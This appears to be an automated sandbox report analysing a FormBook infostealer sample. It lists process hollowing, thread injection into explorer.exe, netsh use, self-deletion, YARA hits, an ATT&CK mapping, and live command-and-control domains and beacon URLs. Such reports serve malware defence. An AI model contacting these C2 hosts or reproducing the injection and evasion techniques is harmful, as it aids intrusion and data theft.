          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1560000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 209008Jump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01001201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_01001201
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FE2BA5
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100B226 SendInput,keybd_event,0_2_0100B226
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100E355 mouse_event,0_2_0100E355
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8t1uarSZFV.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01000B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_01000B62
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01001663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_01001663
          Source: 8t1uarSZFV.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: 8t1uarSZFV.exe, explorer.exe, 00000002.00000003.3113987697.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711530497.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1710146437.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4144086937.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.1709841681.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1710146437.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4144086937.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1710146437.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4144086937.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC0698 cpuid 0_2_00FC0698
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01018195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_01018195
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FFD27A GetUserNameW,0_2_00FFD27A
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FDBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FDBB6F
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA42DE

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: 8t1uarSZFV.exeBinary or memory string: WIN_81
          Source: 8t1uarSZFV.exeBinary or memory string: WIN_XP
          Source: 8t1uarSZFV.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: 8t1uarSZFV.exeBinary or memory string: WIN_XPe
          Source: 8t1uarSZFV.exeBinary or memory string: WIN_VISTA
          Source: 8t1uarSZFV.exeBinary or memory string: WIN_7
          Source: 8t1uarSZFV.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01021204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_01021204
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01021806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01021806

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		11
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts          		2
          Obfuscated Files or Information          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS215
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection          		2
          Valid Accounts          		LSA Secrets341
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
          Virtualization/Sandbox Evasion          		Cached Domain Credentials12
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
          Access Token Manipulation          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
          Process Injection          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1489361 Sample: 8t1uarSZFV.exe Startdate: 07/08/2024 Architecture: WINDOWS Score: 100 32 www.crucka.xyz 2->32 34 www.00050591.xyz 2->34 36 13 other IPs or domains 2->36 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 6 other signatures 2->50 11 8t1uarSZFV.exe 4 2->11         started        signatures3 48 Performs DNS queries to domains with low reputation 34->48 process4 signatures5 60 Binary is likely a compiled AutoIt script file 11->60 62 Found API chain indicative of sandbox detection 11->62 64 Writes to foreign memory regions 11->64 66 2 other signatures 11->66 14 svchost.exe 11->14         started        process6 signatures7 68 Modifies the context of a thread in another process (thread injection) 14->68 70 Maps a DLL or memory area into another process 14->70 72 Sample uses process hollowing technique 14->72 74 3 other signatures 14->74 17 explorer.exe 56 1 14->17 injected process8 dnsIp9 28 00050591.xyz 65.21.196.90, 49736, 80 CP-ASDE United States 17->28 30 californiacurrentelectric.com 66.235.200.145, 49738, 80 CLOUDFLARENETUS United States 17->30 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Uses netsh to modify the Windows network and firewall settings 17->40 21 netsh.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 58 Switches to a custom stack to bypass stack traces 21->58 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          8t1uarSZFV.exe55%ReversingLabsWin32.Trojan.AutoInMalInjector
          8t1uarSZFV.exe47%VirustotalBrowse
          8t1uarSZFV.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.batremake.com0%VirustotalBrowse
          californiacurrentelectric.com1%VirustotalBrowse
          kevintomc.github.io10%VirustotalBrowse
          www.p-afactorysale.shop1%VirustotalBrowse
          arthemis-168bet.site2%VirustotalBrowse
          00050591.xyz1%VirustotalBrowse
          www.crucka.xyz0%VirustotalBrowse
          www.californiacurrentelectric.com0%VirustotalBrowse
          www.urbanholidayz.com0%VirustotalBrowse
          www.00050591.xyz1%VirustotalBrowse
          www.susansellsmarin.com0%VirustotalBrowse
          www.arthemis-168bet.site1%VirustotalBrowse
          www.tech-with-thulitha.site0%VirustotalBrowse
          www.b2vvuc00.sbs0%VirustotalBrowse
          www.fostertv.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://aka.ms/odirmr0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%URL Reputationsafe
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
          https://wns.windows.com/L0%URL Reputationsafe
          https://word.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
          https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://outlook.com_0%URL Reputationsafe
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%URL Reputationsafe
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.crucka.xyzReferer:0%Avira URL Cloudsafe
          http://www.b2vvuc00.sbsReferer:0%Avira URL Cloudsafe
          http://www.susansellsmarin.com0%Avira URL Cloudsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.tech-with-thulitha.site/jd21/www.fostertv.net0%Avira URL Cloudsafe
          http://www.p-afactorysale.shop/jd21/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%URL Reputationsafe
          https://api.msn.com/q0%URL Reputationsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-10%URL Reputationsafe
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
          https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A0%URL Reputationsafe
          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent0%URL Reputationsafe
          https://aka.ms/Vh5j3k0%URL Reputationsafe
          https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
          http://www.00050591.xyz/jd21/0%Avira URL Cloudsafe
          http://www.susansellsmarin.com0%VirustotalBrowse
          http://www.b2vvuc00.sbs/jd21/0%Avira URL Cloudsafe
          http://www.p-afactorysale.shop/jd21/www.arthemis-168bet.site0%Avira URL Cloudsafe
          http://www.tech-with-thulitha.siteReferer:0%Avira URL Cloudsafe
          http://www.crucka.xyz/jd21/www.tech-with-thulitha.site0%Avira URL Cloudsafe
          http://www.p-afactorysale.shop/jd21/2%VirustotalBrowse
          http://www.arthemis-168bet.site/jd21/www.fasci.online0%Avira URL Cloudsafe
          http://www.00050591.xyz/jd21/1%VirustotalBrowse
          http://www.b2vvuc00.sbs/jd21/1%VirustotalBrowse
          http://www.b2vvuc00.sbs/jd21/www.tyumk.xyz0%Avira URL Cloudsafe
          http://www.fostertv.netReferer:0%Avira URL Cloudsafe
          http://www.urbanholidayz.com/jd21/0%Avira URL Cloudsafe
          http://www.susansellsmarin.comReferer:0%Avira URL Cloudsafe
          http://www.zaib.art/jd21/0%Avira URL Cloudsafe
          http://www.tyumk.xyz/jd21/0%Avira URL Cloudsafe
          https://urbanholidayz.com/jd21/?4h6=58Yhl8pxScvjrZW7vdX/11LwICGJdJmrB7bkiksH/i9UnBAUhv3EZPgtL2ZDcYGs0%Avira URL Cloudsafe
          http://www.fostertv.net/jd21/www.p-afactorysale.shop0%Avira URL Cloudsafe
          http://www.susansellsmarin.com/jd21/0%Avira URL Cloudsafe
          http://www.urbanholidayz.com/jd21/1%VirustotalBrowse
          http://www.zaib.artReferer:0%Avira URL Cloudsafe
          http://www.fostertv.net/jd21/0%Avira URL Cloudsafe
          http://www.fasci.online/jd21/www.uhug.xyz0%Avira URL Cloudsafe
          http://www.batremake.com/jd21/0%Avira URL Cloudsafe
          http://www.susansellsmarin.com/jd21/1%VirustotalBrowse
          http://www.zaib.art/jd21/1%VirustotalBrowse
          http://www.tyumk.xyz/jd21/1%VirustotalBrowse
          http://www.urbanholidayz.com0%Avira URL Cloudsafe
          http://www.fostertv.net/jd21/1%VirustotalBrowse
          http://www.00050591.xyz/jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp0%Avira URL Cloudsafe
          http://www.crucka.xyz0%Avira URL Cloudsafe
          http://www.uhug.xyzReferer:0%Avira URL Cloudsafe
          http://www.crucka.xyz/jd21/0%Avira URL Cloudsafe
          http://www.batremake.com/jd21/1%VirustotalBrowse
          http://www.urbanholidayz.com0%VirustotalBrowse
          http://www.zaib.art0%Avira URL Cloudsafe
          http://www.arthemis-168bet.site/jd21/0%Avira URL Cloudsafe
          http://www.arthemis-168bet.site0%Avira URL Cloudsafe
          http://www.00050591.xyz/jd21/www.californiacurrentelectric.com0%Avira URL Cloudsafe
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%Avira URL Cloudsafe
          http://www.californiacurrentelectric.com0%Avira URL Cloudsafe
          http://www.susansellsmarin.com/jd21/www.urbanholidayz.com0%Avira URL Cloudsafe
          http://www.b2vvuc00.sbs0%Avira URL Cloudsafe
          http://www.tyumk.xyz0%Avira URL Cloudsafe
          http://www.tech-with-thulitha.site/jd21/0%Avira URL Cloudsafe
          http://www.uhug.xyz/jd21/0%Avira URL Cloudsafe
          http://www.maioral-store.comReferer:0%Avira URL Cloudsafe
          www.crucka.xyz/jd21/0%Avira URL Cloudsafe
          http://www.fasci.onlineReferer:0%Avira URL Cloudsafe
          http://www.uhug.xyz/jd21/www.maioral-store.com0%Avira URL Cloudsafe
          http://www.p-afactorysale.shopReferer:0%Avira URL Cloudsafe
          http://www.tyumk.xyzReferer:0%Avira URL Cloudsafe
          http://www.californiacurrentelectric.comReferer:0%Avira URL Cloudsafe
          http://www.fasci.online/jd21/0%Avira URL Cloudsafe
          http://www.fostertv.net0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.batremake.com
          		213.186.33.5
          		truefalseunknown
          californiacurrentelectric.com
          		66.235.200.145
          		truetrueunknown
          kevintomc.github.io
          		185.199.108.153
          		truefalseunknown
          www.p-afactorysale.shop
          		104.18.24.121
          		truefalseunknown
          arthemis-168bet.site
          		84.32.84.32
          		truetrueunknown
          00050591.xyz
          		65.21.196.90
          		truetrueunknown
          www.b2vvuc00.sbs
          		unknown
          		unknowntrueunknown
          www.tech-with-thulitha.site
          		unknown
          		unknowntrueunknown
          www.00050591.xyz
          		unknown
          		unknowntrueunknown
          www.urbanholidayz.com
          		unknown
          		unknowntrueunknown
          www.crucka.xyz
          		unknown
          		unknowntrueunknown
          www.fostertv.net
          		unknown
          		unknowntrueunknown
          www.californiacurrentelectric.com
          		unknown
          		unknowntrueunknown
          www.susansellsmarin.com
          		unknown
          		unknowntrueunknown
          www.arthemis-168bet.site
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://www.00050591.xyz/jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNptrue
          • Avira URL Cloud: safe
          		unknown
          www.crucka.xyz/jd21/true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.p-afactorysale.shop/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.tech-with-thulitha.site/jd21/www.fostertv.netexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/odirmrexplorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.crucka.xyzReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.susansellsmarin.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.b2vvuc00.sbsReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.00050591.xyz/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
